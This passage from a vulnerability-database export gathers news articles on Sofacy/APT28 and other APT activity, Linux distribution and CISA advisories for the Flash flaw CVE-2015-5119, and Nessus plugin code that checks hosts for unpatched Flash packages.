the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said, \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "cvss3": {}, "published": "2017-08-08T16:34:08", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "modified": "2017-08-22T12:54:04", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:59", "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said that it discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher profile victims, and including in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day, instead it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&amp;C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. \u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&amp;C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "cvss3": {}, "published": "2015-12-04T07:05:37", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-12-04T21:35:34", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "description": "A critical vulnerability (use-after-free in the AS3 ByteArray class) has\nbeen identified in Adobe Flash Player 18.0.0.194 and earlier versions\nfor Windows, Macintosh and Linux. Successful exploitation could cause a\ncrash and potentially allow an attacker to take control of the affected\nsystem.\n\nAdobe is aware of reports that an exploit targeting this vulnerability\nhas been published publicly.", "edition": 2, "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "archlinux", "title": "flashplugin: remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "ASA-201507-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000361.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-02-24T18:08:05", "description": "Adobe has released security updates to address multiple vulnerabilities in Flash Player for Windows, Macintosh, and Linux. These include a critical vulnerability ([CVE-2015-5119](<http://helpx.adobe.com/security/products/flash-player/apsa15-03.html>)) in Adobe Flash Player 18.0.0.194 and earlier versions. Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been made publicly available.\n\nUsers and administrators are encouraged to review Adobe Security Bulletin [APSB15-16](<http://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "cisa", "title": "Adobe Releases Security Updates for Flash Player", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "CISA:2A8422190E3030D1FA551BC2C97714D9", "href": "https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player. These\n\t updates address critical vulnerabilities that could potentially\n\t allow an attacker to take control of the affected system. Adobe is\n\t aware of a report that an exploit targeting CVE-2015-5119 has been\n\t publicly published.\n\t \n\n\n", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "freebsd", "title": "Adobe Flash Player -- critical vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-07T00:00:00", "id": "348BFA69-25A2-11E5-ADE1-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-05T17:18:23", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been publicly published.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/nessus/84628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84628);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2015-5119\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These\nupdates address critical vulnerabilities that could potentially allow\nan attacker to take control of the affected system. Adobe is aware of\na report that an exploit targeting CVE-2015-5119 has been publicly\npublished.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?639ba9ec\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.481\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.481\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:17:49", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to take over the system (bsc#937339).", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/84629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-473.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84629);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2015-5119\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-473) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5119: Unspecified vulnerability allowing remote\n attackers to take over the system (bsc#937339).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937339\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.481-126.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.481-2.61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.481-2.61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:17:50", "description": "flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433: Type confusion vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119: Use-after-free vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-13T00:00:00", "type": "nessus", "title": "SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1214-1) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "p-cpe:/a:novell:suse_linux:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1214-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1214-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84663);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\"\n );\n script_bugtraq_id(\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED11 Security Update : flash-player (SUSE-SU-2015:1214-1) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer\n overflow vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130,\n CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory\n corruption vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference\n issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that\n could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121,\n CVE-2015-3122, CVE-2015-4433: Type confusion\n vulnerabilities that could lead to code execution\n (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117,\n CVE-2015-3127, CVE-2015-3128, CVE-2015-3129,\n CVE-2015-3131, CVE-2015-3132, CVE-2015-3136,\n CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could\n lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116,\n CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could\n be exploited to bypass the same-origin-policy and lead\n to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=937339\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2014-0578/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3118/\");\n script_set_attribute(attribute:\"see_also\", 